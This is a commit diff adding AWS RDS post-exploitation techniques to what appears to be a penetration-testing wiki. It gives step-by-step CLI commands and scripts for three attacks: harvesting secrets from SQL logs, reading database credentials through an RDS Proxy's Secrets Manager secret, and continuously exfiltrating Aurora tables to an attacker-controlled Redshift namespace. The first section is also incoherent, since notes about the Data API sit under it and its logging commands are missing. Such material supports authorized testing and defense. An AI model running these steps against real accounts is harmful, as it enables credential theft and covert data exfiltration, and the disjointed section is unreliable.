Commit 6dd86b2 ("rds post recheck", parent 95302db)

1 file changed: +185 -2 lines

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
</details>

### Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs

Abuse `rds:ModifyDBParameterGroup` together with the RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine-level SQL logging and pull the log files via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile` endpoint). This is useful for collecting queries that may contain secrets/PII/JWTs.
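
Once downloaded, the log text can be triaged offline for high-value material. A minimal sketch (pure Python; the log excerpt and patterns are illustrative assumptions, not real output) that flags statements containing JWT-like tokens or password assignments:

```python
import re

# Hypothetical excerpt from a downloaded log portion (illustrative only)
log_text = """\
2024-05-01 12:00:01 UTC LOG: statement: SELECT * FROM users WHERE id = 1;
2024-05-01 12:00:02 UTC LOG: statement: UPDATE accounts SET api_token = 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.sig' WHERE id = 7;
2024-05-01 12:00:03 UTC LOG: statement: INSERT INTO creds (usr, password) VALUES ('svc', 'S3cr3t!');
"""

# JWTs base64url-encode '{"alg":...' so they start with 'eyJ'; also flag password-style keywords
patterns = [
    re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),  # JWT-like token
    re.compile(r"password", re.IGNORECASE),
]

hits = [line for line in log_text.splitlines()
        if any(p.search(line) for p in patterns)]
for line in hits:
    print(line)
```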
Notes:

- If multi-statement SQL is rejected by rds-data, issue separate `execute-statement` calls.
- For engines where `modify-db-cluster --enable-http-endpoint` has no effect, use `rds enable-http-endpoint --resource-arn`.
- Ensure the engine/version actually supports the Data API; otherwise `HttpEndpointEnabled` will remain `False`.

### Harvest DB credentials via RDS Proxy auth secrets (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`)

Abuse the RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read that secret to obtain database credentials. Many environments grant broad `secretsmanager:GetSecretValue`, making this a low-friction pivot to DB creds. If the secret is encrypted with a CMK, mis-scoped KMS permissions may also allow `kms:Decrypt`.

Permissions needed (minimum):

- `rds:DescribeDBProxies`
- `secretsmanager:GetSecretValue` on the referenced `SecretArn`
- Optional, when the secret uses a CMK: `kms:Decrypt` on that key

Impact: immediate disclosure of the DB username/password configured on the proxy; enables direct DB access or further lateral movement.
Steps:

```bash
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
  --query 'DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn]' \
  --output table

# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
  --secret-id <SecretArnFromProxy> \
  --query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}
```

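The `SecretString` returned in step 2 is JSON; a small sketch of turning it into usable credentials (the payload mirrors the example output above; RDS-managed secrets may additionally carry `host`/`port`/`engine` keys, and the `<proxy-endpoint>` placeholder is illustrative):

```python
import json

# Example SecretString as returned by get-secret-value (shape shown above)
secret_string = '{"username":"admin","password":"S3cr3t!"}'

creds = json.loads(secret_string)
conn_user, conn_pass = creds["username"], creds["password"]
# Build a connection one-liner against the proxy endpoint
print(f"mysql -h <proxy-endpoint> -u {conn_user} -p'{conn_pass}'")
```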
Lab (minimal setup to reproduce):

```bash
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
# Secret holding the backend DB credentials the proxy will use
SECRET_ARN=$(aws secretsmanager create-secret \
  --region $REGION --name rds/proxy/aurora-demo \
  --secret-string '{"username":"admin","password":"S3cr3t!"}' \
  --query ARN --output text)
# Role that RDS Proxy assumes to read the secret
aws iam create-role --role-name rds-proxy-secret-role \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"rds.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name rds-proxy-secret-role \
  --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
  --auth "AuthScheme=SECRETS,SecretArn=$SECRET_ARN" \
  --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
  --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query 'Subnets[].SubnetId' --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above
```

Cleanup (lab):

```bash
aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery
```

### Stealthy continuous exfiltration via Aurora zero-ETL to Amazon Redshift (`rds:CreateIntegration`)

Abuse Aurora PostgreSQL zero-ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes `CreateInboundIntegration`/`AuthorizeInboundIntegration` for a specific Aurora cluster ARN, an attacker can establish a near-real-time data copy without DB credentials, snapshots, or network exposure.

Permissions needed (minimum):

- `rds:CreateIntegration`, `rds:DescribeIntegrations`, `rds:DeleteIntegration`
- `redshift:PutResourcePolicy`, `redshift:DescribeInboundIntegrations`, `redshift:DescribeIntegrations`
- `redshift-data:ExecuteStatement`/`GetStatementResult`/`ListDatabases` (to query)
- `rds-data:ExecuteStatement` (optional; to seed data if needed)

Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.

<details>
<summary>1) Create Redshift Serverless namespace + workgroup</summary>

```bash
REGION=us-east-1
RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \
  --admin-username adminuser --admin-user-password 'AdminPwd-1!' \
  --query namespace.namespaceArn --output text)
RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \
  --namespace-name ztl-ns --base-capacity 8 --publicly-accessible \
  --query workgroup.workgroupArn --output text)
# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL sources)
aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \
  --config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true
```

</details>

<details>
<summary>2) Configure the Redshift resource policy to allow the Aurora source</summary>

```bash
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SRC_ARN=<AURORA_CLUSTER_ARN>
cat > rs-rp.json <<JSON
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AuthorizeInboundByRedshiftService",
      "Effect": "Allow",
      "Principal": {"Service": "redshift.amazonaws.com"},
      "Action": "redshift:AuthorizeInboundIntegration",
      "Resource": "$RS_NS_ARN",
      "Condition": {"StringEquals": {"aws:SourceArn": "$SRC_ARN"}}
    },
    {
      "Sid": "AllowCreateInboundFromAccount",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::$ACCOUNT_ID:root"},
      "Action": "redshift:CreateInboundIntegration",
      "Resource": "$RS_NS_ARN"
    }
  ]
}
JSON
aws redshift put-resource-policy --region $REGION --resource-arn "$RS_NS_ARN" --policy file://rs-rp.json
```

</details>
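
The same two-statement policy can also be generated programmatically and sanity-checked before calling `put-resource-policy`. A sketch (the ARNs and account ID are placeholders, not values from the lab above):

```python
import json

# Placeholder ARNs; in practice use the real namespace/cluster ARNs
rs_ns_arn = "arn:aws:redshift-serverless:us-east-1:111111111111:namespace/abc"
src_arn = "arn:aws:rds:us-east-1:111111111111:cluster:aurora-ztl"
account_id = "111111111111"

policy = {
    "Version": "2012-10-17",
    "Statement": [
        {   # Lets the Redshift service authorize the inbound integration,
            # but only when the source is the targeted Aurora cluster
            "Sid": "AuthorizeInboundByRedshiftService",
            "Effect": "Allow",
            "Principal": {"Service": "redshift.amazonaws.com"},
            "Action": "redshift:AuthorizeInboundIntegration",
            "Resource": rs_ns_arn,
            "Condition": {"StringEquals": {"aws:SourceArn": src_arn}},
        },
        {   # Lets principals in the account create the inbound integration
            "Sid": "AllowCreateInboundFromAccount",
            "Effect": "Allow",
            "Principal": {"AWS": f"arn:aws:iam::{account_id}:root"},
            "Action": "redshift:CreateInboundIntegration",
            "Resource": rs_ns_arn,
        },
    ],
}

doc = json.dumps(policy, indent=2)
print(doc)  # write to rs-rp.json for --policy file://rs-rp.json
```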

<details>
<summary>3) Create the Aurora PostgreSQL cluster (enable Data API and logical replication)</summary>

```bash
CLUSTER_ID=aurora-ztl
aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --engine aurora-postgresql --engine-version 16.4 \
  --master-username postgres --master-user-password 'InitPwd-1!' \
  --enable-http-endpoint --no-deletion-protection --backup-retention-period 1
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
# Serverless v2 instance
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately
aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \
  --db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
# Cluster parameter group for zero-ETL
aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \
  --db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params"
aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \
  ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
  ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
  ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \
  ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
  --db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately
aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text)
```

</details>

<details>
<summary>4) Create the zero-ETL integration from RDS</summary>

```bash
# Include all tables in the default 'postgres' database
aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \
  --target-arn "$RS_NS_ARN" --integration-name ztl-demo \
  --data-filter 'include: postgres.*.*'
# The Redshift inbound integration should become ACTIVE
aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN"
```

</details>

<details>
<summary>5) Materialize and query replicated data in Redshift</summary>

```bash
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "select integration_id from svv_integration"  # take the GUID value
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "create database ztl_db from integration '<integration_id>' database postgres"
# List replicated tables
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
  --sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"
```

</details>
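
Stitching step 5 together: a sketch that pulls the `integration_id` out of a `get-statement-result`-shaped response and renders the `CREATE DATABASE FROM INTEGRATION` statement (the response payload is a hand-built sample mimicking the Redshift Data API record format, not captured output):

```python
# Sample response shaped like `aws redshift-data get-statement-result` output
result = {
    "ColumnMetadata": [{"name": "integration_id"}],
    "Records": [[{"stringValue": "377a462b-c42c-4f08-937b-77fe75d98211"}]],
}

# Each record is a row; each field is a typed value dict (stringValue here)
integration_id = result["Records"][0][0]["stringValue"]
sql = f"create database ztl_db from integration '{integration_id}' database postgres"
print(sql)
```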
Evidence observed in testing:

- `redshift describe-inbound-integrations`: Status ACTIVE for Integration arn:...377a462b-...
- SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 and state PendingDbConnectState prior to database creation.
- After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob).

Impact: continuous near-real-time exfiltration of selected Aurora PostgreSQL tables into attacker-controlled Redshift Serverless, without using database credentials, backups, or network access to the source cluster.

{{#include ../../../banners/hacktricks-training.md}}
